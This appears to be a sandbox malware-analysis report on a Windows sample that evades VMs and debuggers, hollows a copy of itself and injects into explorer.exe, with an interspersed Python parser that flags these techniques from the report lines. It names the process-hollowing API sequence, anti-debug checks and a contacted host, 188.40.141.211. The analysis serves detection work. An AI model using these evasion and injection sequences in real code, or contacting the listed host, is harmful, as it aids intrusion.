CP,TerminateProcess,FindFirstFileA,InterlockedIncrement,GetVolumeNameForVolumeMountPointA,GetModuleHandleW,CreateActCtxA,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GetModuleHandleA,CreateEventA,ExpandEnvironmentStringsW,SetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,0_2_004257E0
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\e6reA52T4I.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 times)
Source: C:\Users\user\AppData\Roaming\hdeufvw | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (6 times)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | API/Special instruction interceptor: Address: 7FF8418CE814
Source: C:\Users\user\AppData\Roaming\hdeufvw | API/Special instruction interceptor: Address: 7FF8418CE814
Source: e6reA52T4I.exe, 00000002.00000002.1576758171.000000000056B000.00000004.00000020.00020000.00000000.sdmp, hdeufvw, 00000006.00000002.1863818319.00000000006B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 404
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 454
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 891
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 857
Source: C:\Windows\explorer.exe TID: 4912 | Thread sleep count: 404 > 30
Source: C:\Windows\explorer.exe TID: 4952 | Thread sleep count: 34 > 30
Source: C:\Windows\explorer.exe TID: 4772 | Thread sleep count: 32 > 30
Source: C:\Windows\explorer.exe TID: 2672 | Thread sleep count: 454 > 30
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004257E0 GetConsoleProcessList,CharUpperA,CharToOemBuffA,CharToOemBuffA,GetConsoleProcessList,WriteProfileStringW,RegisterClassA,SetThreadContext,GetFileAttributesExA,_fputc,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GlobalAlloc,GetWindowsDirectoryW,SetThreadAffinityMask,SetProcessShutdownParameters,GetWindowsDirectoryW,SetThreadAffinityMask,ReadConsoleOutputCharacterA,SetProcessShutdownParameters,BuildCommDCBAndTimeoutsW,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,GetPrivateProfileStringW,GetPrivateProfileStringW,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleCursorInfo,VirtualProtect,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,GlobalUnfix,OpenWaitableTimerW,GlobalFlags,LocalFlags,LoadLibraryW,GetConsoleCursorInfo,SetConsoleCP,TerminateProcess,FindFirstFileA,InterlockedIncrement,GetVolumeNameForVolumeMountPointA,GetModuleHandleW,CreateActCtxA,_lclose,ReadConsoleW,GetNamedPipeHandleStateW,GetModuleHandleA,CreateEventA,ExpandEnvironmentStringsW,SetProcessAffinityMask,SetTimeZoneInformation,ActivateActCtx,DeleteVolumeMountPointA,0_2_004257E0
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0042545B WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_0042545B
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00425400 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425400
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004255C0 DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255C0
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004255F6 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F6
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004255F4 ReadConsoleInputA,WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_004255F4
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00425659 WriteConsoleInputW,GlobalGetAtomNameA,GetCommandLineW,MoveFileWithProgressA,FindFirstFileW,0_2_00425659
Source: explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
Source: explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1567258720.00000000094DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTbrVMWare
Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}?
Source: explorer.exe, 00000003.00000002.2728248249.000000000952D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1567258720.000000000952D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000000.1567258720.00000000093B4000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
Source: explorer.exe, 00000003.00000002.2728248249.00000000094DC000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000003.00000000.1567932050.00000000095B9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000003.00000002.2725144997.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\e6reA52T4I.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\e6reA52T4I.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

Source: C:\Users\user\Desktop\e6reA52T4I.exe | System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\hdeufvw | System information queried: CodeIntegrityInformation
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\hdeufvw | Process queried: DebugPort
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040AB19 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004117B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00930042 push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00AC2B5D push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_00860042 push dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_00991D1D push dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040C0AA SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | File created: hdeufvw.3.dr
Source: C:\Windows\explorer.exe | Network Connect: 188.40.141.211 80
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00930110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Thread created: C:\Windows\explorer.exe EIP: B31930
Source: C:\Users\user\AppData\Roaming\hdeufvw | Thread created: unknown EIP: 83F1930
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Memory written: C:\Users\user\Desktop\e6reA52T4I.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\hdeufvw | Memory written: C:\Users\user\AppData\Roaming\hdeufvw base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\hdeufvw | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\hdeufvw | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Process created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"
Source: C:\Users\user\AppData\Roaming\hdeufvw | Process created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvw
Source: explorer.exe, 00000003.00000000.1561646634.0000000004460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Manager
Source: explorer.exe, 00000003.00000002.2723738796.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 1Progman
Source: explorer.exe, 00000003.00000002.2724412389.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1560321876.0000000001080000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040E45D __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040E8D8 GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040ECA0 __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040ED60 _GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040E16F __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040D513 ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040AD2F GetLocaleInfoA
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004095C4 ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040EDC7 _GetPrimaryLen,EnumSystemLocalesA
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040E9CD __getptd,_LcidFromHexString,GetLocaleInfoA
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040EA74 GetLocaleInfoW,_GetPrimaryLen
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040EE03 __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040EACF __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_TestDefaultLanguage
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00411EDD GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00411B1D GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00411BF7 _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040BBBA ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040C580 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
Source: C:\Windows\explorer.exe | Code function: 3_2_00B33534 GetUserNameW
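Most of the evidence in the Anti Debugging and HIPS / PFW sections above arrives in two line shapes: a "Code function" line (a function address followed by the API chain it calls) and a "Binary or memory string" line. Reading them by hand is error-prone in both directions: the chain at 0_2_00930110 (CreateProcessA, Wow64GetThreadContext, NtUnmapViewOfSection, VirtualAllocEx, NtWriteVirtualMemory/WriteProcessMemory, Wow64SetThreadContext, ResumeThread) only means process hollowing when those calls occur in that order, and GetModuleFileNameA right before CreateProcessA, together with the "Process created: ... e6reA52T4I.exe" line, says the hollowed target is a second copy of the sample itself, with the hop into explorer.exe being the later "Section loaded" / "Thread created" pair. Conversely, 0_2_0040C580 (GetSystemTimeAsFileTime ... QueryPerformanceCounter) is the API set of the MSVC CRT's __security_init_cookie, not a timing check, and IsDebuggerPresent followed by SetUnhandledExceptionFilter and UnhandledExceptionFilter at 0_2_0040AB19 is the CRT's fault-reporting path rather than a deliberate debugger test; the `push dword ptr fs:[00000030h]` lines, by contrast, fetch the PEB pointer from the 32-bit TEB, which is where inline checks of PEB.BeingDebugged (+0x02) and PEB.NtGlobalFlag (+0x68) start. The example below is added here and is not Joe Sandbox code: it parses the two line shapes (tolerating an optional " | " between the fields and the trailing repeated address), checks the hollowing chain in order, flags PEB fetches and debugger APIs, matches VM vendor strings, and allow-lists the two CRT sequences as noise. The sample lines are copied from this report; the technique labels, the chain definition, the VM marker list and the CRT allow-list are this example's assumptions. The CodeIntegrityInformation / DebugPort query lines and the Section loaded / Thread created lines are not parsed.

```python
"""Map Joe Sandbox "Code function" / "memory string" lines to techniques.

Added example for this report page; not Joe Sandbox code. Technique names,
the hollowing chain, the VM markers and the CRT allow-list are assumptions.
"""
import re

# "Source: <file>Code function: <addr> <api,api,...>,<addr>"; an optional " | "
# between the fields and the trailing repeated address are both tolerated.
CODE_RE = re.compile(
    r"^Source: (?P<src>.+?)(?: \| )?Code function: (?P<addr>\d+_\d+_[0-9A-Fa-f]+) "
    r"(?P<body>.*?)(?:,?(?P=addr))?$"
)
MEM_RE = re.compile(
    r"^Source: (?P<src>.+?\.sdmp)(?: \| )?Binary or memory string: (?P<text>.*)$"
)

# Process hollowing: one member of every group must appear, in this order.
# CreateProcess is normally called with CREATE_SUSPENDED; the report line
# cannot show the flags, so the order of the later calls carries the evidence.
HOLLOWING_CHAIN = [
    {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    {"Wow64GetThreadContext", "GetThreadContext"},
    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    {"VirtualAllocEx", "NtAllocateVirtualMemory"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
]
DEBUGGER_APIS = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent", "NtQueryInformationProcess"}
# fs:[0x30] is the PEB pointer in the 32-bit TEB; PEB.BeingDebugged (+0x02) and
# PEB.NtGlobalFlag (+0x68) are what inline debugger checks read through it.
PEB_FETCH = "fs:[00000030h]"
VM_MARKERS = ("vmware", "necvmwar", "hyper-v", "vbox", "virtualbox", "qemu", "virtual_disk")
# API sequences the MSVC CRT emits on its own (assumption: treat as noise, not evasion).
CRT_NOISE = {
    ("GetSystemTimeAsFileTime", "GetCurrentProcessId", "GetCurrentThreadId",
     "GetTickCount", "QueryPerformanceCounter"),            # __security_init_cookie
    ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
     "UnhandledExceptionFilter"),                           # CRT fault-report path
}


def parse_line(line):
    """Return ("code", src, addr, [apis]), ("mem", src, text) or None."""
    m = CODE_RE.match(line)
    if m:
        apis = [a for a in m.group("body").split(",") if a]
        return ("code", m.group("src"), m.group("addr"), apis)
    m = MEM_RE.match(line)
    if m:
        return ("mem", m.group("src"), m.group("text"))
    return None


def chain_in_order(apis, chain):
    """True if one member of each group occurs in `apis`, in chain order."""
    pos = 0
    for group in chain:
        hits = [i for i in range(pos, len(apis)) if apis[i] in group]
        if not hits:
            return False
        pos = hits[0] + 1
    return True


def classify(record):
    """Technique labels for one parsed record (empty list = nothing of note)."""
    if record[0] == "mem":
        text = record[2].lower()
        return ["virtualization_artifact"] if any(k in text for k in VM_MARKERS) else []
    apis = record[3]
    if tuple(apis) in CRT_NOISE:
        return ["crt_runtime_noise"]
    labels = []
    if chain_in_order(apis, HOLLOWING_CHAIN):
        labels.append("process_hollowing")
    if DEBUGGER_APIS & set(apis) or any(PEB_FETCH in a for a in apis):
        labels.append("debugger_check")
    return labels


def triage(lines):
    """(function address or dump id, labels) for every line the parser understands."""
    out = []
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            key = rec[2] if rec[0] == "code" else rec[1]
            out.append((key, classify(rec)))
    return out


# Constructed input: lines copied from this report's signature sections.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00930110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00930110",
    r"Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040AB19 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040AB19",
    r"Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_00930042 push dword ptr fs:[00000030h]0_2_00930042",
    r"Source: C:\Users\user\Desktop\e6reA52T4I.exeCode function: 0_2_0040C580 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040C580",
    r"Source: explorer.exe, 00000003.00000000.1559516725.0000000000889000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;",
    r"Source: C:\Windows\explorer.exeCode function: 3_2_00B33534 GetUserNameW,3_2_00B33534",
]

if __name__ == "__main__":
    for key, labels in triage(SAMPLE_LINES):
        print(f"{key[:40]:<40}  {', '.join(labels) or '-'}")
```

The ordered-chain check is the part worth keeping: a set-membership rule would also fire on the CRT and on benign loaders that call these APIs in a different order, while the order constraint pins the hollowing sequence the report shows at 0_2_00930110. The allow-list is the opposite adjustment, and it is why the locale and `__invoke_watson` chains listed just above are CRT initialisation rather than capability.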

                Stealing of Sensitive Information

Source: Yara match | File source: 5.2.hdeufvw.8615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hdeufvw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.e6reA52T4I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.e6reA52T4I.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

Source: Yara match | File source: 5.2.hdeufvw.8615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hdeufvw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.e6reA52T4I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.e6reA52T4I.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one column per tactic; a number in parentheses is the badge the report attaches to a technique matched by this sample)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Native API (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Obfuscated Files or Information (2) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (2) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | Boot or Logon Initialization Scripts | Process Injection (512) | Software Packing (12) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Logon Script (Windows) | Logon Script (Windows) | DLL Side-Loading (1) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | File Deletion (1) | NTDS | System Information Discovery (113) | Distributed Component Object Model | Input Capture | Application Layer Protocol (113) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Masquerading (11) | LSA Secrets | Security Software Discovery (521) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
